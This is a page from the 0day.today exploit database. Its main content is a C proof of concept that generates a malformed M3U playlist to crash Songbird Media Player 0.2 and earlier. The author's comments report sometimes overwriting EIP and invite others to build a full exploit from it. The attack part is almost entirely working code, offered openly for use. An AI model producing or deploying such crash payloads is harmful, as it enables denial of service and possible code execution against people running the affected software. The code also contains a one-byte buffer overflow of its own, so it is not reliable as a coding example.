0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Songbird Media Player <= 0.2 Format String Denial of Service PoC
================================================================ Songbird Media Player <= 0.2 Format String Denial of Service PoC ================================================================ /* ======================================================================== 0-day Songbird Media Player <= 0.2 Format String Denial Of Service PoC ======================================================================== Songbird Media Player and lower experiance a format string conversion error when attempting to parse out malformed M3U Playlist files in which extended ascii exists in any field. The problem seems to originate in the unicode coverter which kicks into effect when extended ascii is present in a M3U file. It can even cause a huge spike in CPU Resources, a few times mine flatlined at 99% after exploit and required a system reboot. I don't have the time to try to turn this into an exploit, but i've seen it overwrite EIP with some values - the string is getting converted to unicode prior to the error. And sometimes EIP gets randomly overwritten with values, and sometimes the application just crashes. For me using this exploit EIP gets overwritten with 0x35382534 = "58%4" sometimes its 0x3f3f3f3f and sometimes its 0xfffffff3. I noticed removing a file extension from the exploit causes EIP to get overwriten more frequently. Im sure someone will turn this into an exploit, just credit me with my name and email address in the exploit, I'll be more than happy. Happy Hunting and Happy Holidays to everyone <insert super awesome leet ascii art here> November 2006 - Month Of Greg's Media Player Exploits :) (i'll probably continue it into December) Discovered and Reported By: Greg Linares GLinares.code@gmail.com Reported Exploit Date: 11/28/2006 */ #include <stdio.h> #include <stdlib.h> #include <string.h> int main(int argc, char *argv[]) { FILE *Exploit; char buffer[512]; int x; printf("\n======================================================================\n"); printf("0-day Songbird Media Player <= 0.2 Format String Denial Of Service PoC \n"); printf("Crashes Songbird Player sometimes consumes 99%% CPU and needs reboot \n"); printf("Discovered and Coded By: Greg Linares <GLinares.code[at]gmail[dot]com>\n"); printf("Usage: %s <output M3U file>\n", argv[0]); printf("====================================================================\n\n\n"); if (argc < 2) { printf("Invalid Number Of Arguments\n"); return 1; } Exploit = fopen(argv[1],"w"); if ( !Exploit ) { printf("\nCouldn't Open File!"); return 1; } memset(buffer, 0, 512); for (x=0;x<512;x++) { strcat(buffer, "A"); } /* I havent played around with much extended ascii but i do know \xb5 - \xbf work */ /* Vulgar Fractions Scare Me Too */ fputs("#EXTM3U\r\n#EXTINF:0,0_day_Songbird_Format_String_PoC_by_Greg_Linares\xbc", Exploit); fputs(buffer, Exploit); fputs(buffer, Exploit); fputs("\r\nC:\\", Exploit); fputs(buffer, Exploit); /* This works as well here but sometimes EIP doesnt get overwritten and the application just crashes. fputs(".mp3\r\n", Exploit); fputs("C:\\RANDOMFILENAMEHERE\xbc\xbx\xbc\xbc", Exploit); fputs(buffer, Exploit); fputs(".mp3\r\n", Exploit); */ printf("Exploit Succeeded...\n Output File: %s\n\n", argv[1]); printf("Questions, Comments, Feedback --> Greg Linares (GLinares.code[at]gmail[dot]com)\n"); fclose(Exploit); return 0; } # 0day.today [2024-12-25] #